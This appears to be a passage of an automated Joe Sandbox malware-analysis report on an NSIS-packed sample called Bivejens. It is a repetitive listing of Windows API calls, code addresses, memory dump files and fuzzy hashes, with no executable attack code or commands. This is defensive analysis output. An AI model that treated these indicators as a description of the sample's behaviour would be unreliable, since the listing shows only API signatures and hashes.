                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                          • Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
                                                                                                                          • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                          • Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 004026F1
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00402714
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040272A
                                                                                                                            • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E71
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,?,?,?,?), ref: 004027D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                          • String ID: 9
                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                          • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                          • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                                                          • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                                                          • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                          • String ID: ... %d%%
                                                                                                                          • API String ID: 551687249-2449383134
                                                                                                                          • Opcode ID: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
                                                                                                                          • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                                                          • Opcode Fuzzy Hash: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
                                                                                                                          • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                                                                                          APIs
                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,774D3420,004035A3,?,?,?,?), ref: 0040657B
                                                                                                                          • CharNextW.USER32(?,?,?,00000000,?,?,?,?), ref: 0040658A
                                                                                                                          • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,774D3420,004035A3,?,?,?,?), ref: 0040658F
                                                                                                                          • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,774D3420,004035A3,?,?,?,?), ref: 004065A2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: *?|<>/":
                                                                                                                          • API String ID: 589700163-165019052
                                                                                                                          • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                          • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                                          • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                          • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                                          APIs
                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,?), ref: 004017B0
                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,?), ref: 004017D5
                                                                                                                            • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,?,?,?), ref: 00406291
                                                                                                                            • Part of subcall function 004052EC: lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                            • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                            • Part of subcall function 004052EC: lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
                                                                                                                            • Part of subcall function 004052EC: SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                            • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1941528284-0
                                                                                                                          • Opcode ID: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
                                                                                                                          • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                                                          • Opcode Fuzzy Hash: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
                                                                                                                          • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1849352358-0
                                                                                                                          • Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                          • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                                                          • Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                          • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                                                          APIs
                                                                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Timeout
                                                                                                                          • String ID: !
                                                                                                                          • API String ID: 1777923405-2657877971
                                                                                                                          • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                          • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                                                          • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                          • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                                                          APIs
                                                                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Close$Enum
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 464197530-0
                                                                                                                          • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                          • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                                                          • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                          • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(?,00000000,00403059,?,?,?,?,?), ref: 00402E8C
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                          • CreateDialogParamW.USER32(?,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,?), ref: 00402ED5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2102729457-0
                                                                                                                          • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                          • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                                                                          • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                          • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                                            • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                          • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                                                          • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                          • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004058A3
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 00405880
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                          • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                                                                                                          • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                                                                          • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                          • Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
                                                                                                                          • Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
                                                                                                                          • Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                          • Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
                                                                                                                          • Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
                                                                                                                          • Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                          • Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
                                                                                                                          • Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
                                                                                                                          • Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                          • Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
                                                                                                                          • Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
                                                                                                                          • Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                          • Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
                                                                                                                          • Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
                                                                                                                          • Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45